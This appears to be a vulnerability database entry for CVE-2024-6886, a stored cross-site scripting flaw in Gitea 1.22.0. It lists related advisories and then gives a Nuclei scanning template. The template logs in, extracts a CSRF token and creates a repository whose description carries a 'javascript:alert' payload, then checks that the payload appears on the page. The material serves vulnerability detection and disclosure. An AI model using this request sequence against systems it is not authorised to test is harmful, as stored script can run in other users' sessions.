| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
| Gitea 1.22.0 - Stored XSS Vulnerability | 28 Aug 202400:00 | – | zdt | |
| The vulnerability of the Git repository management system Gitea arises from the lack of measures taken to protect the structure of the web page. This allows attackers to carry out cross-site scripting attacks. | 16 Aug 202400:00 | – | bdu_fstec | |
| CVE-2024-6886 | 6 Aug 202407:28 | – | circl | |
| Gitea 跨站脚本漏洞 | 6 Aug 202400:00 | – | cnnvd | |
| CVE-2024-6886 | 6 Aug 202403:23 | – | cve | |
| CVE-2024-6886 Inproper Sanitation of field leading to stored XSS | 6 Aug 202403:23 | – | cvelist | |
| Gitea 1.22.0 - Stored XSS | 28 Aug 202400:00 | – | exploitdb | |
| EUVD-2024-2490 | 3 Oct 202520:07 | – | euvd | |
| Gitea Cross-site Scripting Vulnerability | 6 Aug 202406:30 | – | github | |
| Gitea Cross-site Scripting Vulnerability | 6 Aug 202400:00 | – | gitlab |
| Source | Link |
|---|---|
| exploit-db | www.exploit-db.com/exploits/52077 |
| nvd | www.nvd.nist.gov/vuln/detail/CVE-2024-6886 |
id: CVE-2024-6886
info:
name: Gitea 1.22.0 - Cross-Site Scripting
author: soonghee2
severity: medium
description: |
Gitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.
impact: |
Authenticated attackers can inject malicious JavaScript into repository descriptions that executes in the context of other users' sessions when they view the repository.
remediation: |
Update Gitea to version 1.22.1 or later to address the stored XSS vulnerability.
reference:
- https://www.exploit-db.com/exploits/52077
- https://nvd.nist.gov/vuln/detail/CVE-2024-6886
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:L
cvss-score: 6.7
cve-id: CVE-2024-6886
cwe-id: CWE-79
epss-score: 0.40321
epss-percentile: 0.9847
cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
vendor: gitea
product: gitea
tags: cve,cve2024,gitea,xss,authenticated,vuln
variables:
username: "{{username}}"
password: "{{password}}"
http:
- raw:
- |
POST /user/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user_name={{username}}&password={{password}}
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
GET /{{username}} HTTP/1.1
Host: {{Hostname}}
- |
POST /repo/create HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
repo_name={{randstr}}&description=<a%20href="javascript:alert(document.domain)">XSS</a>&_csrf={{csrf_token}}&uid={{uid_name}}
- |
GET /{{username}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_5
words:
- '<a href="javascript:alert(document.domain)">XSS</a>'
- 'gitea'
condition: and
- type: word
part: header_5
words:
- text/html
- type: status
status:
- 200
extractors:
- type: regex
name: csrf_token
group: 1
regex:
- 'name="_csrf" value="([^"]+)"'
internal: true
- type: regex
name: uid_name
group: 1
regex:
- '"uid":\s*(\d+)'
internal: true
# digest: 4b0a00483046022100cc325e9b59504a629127c664ce10e04f739ad87ad7eb12c39c6a52dae0160847022100aecbb7505207dfb90e7ebbd8f908ea2ade26a38af5f5782d64d3bc26d669dd10:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation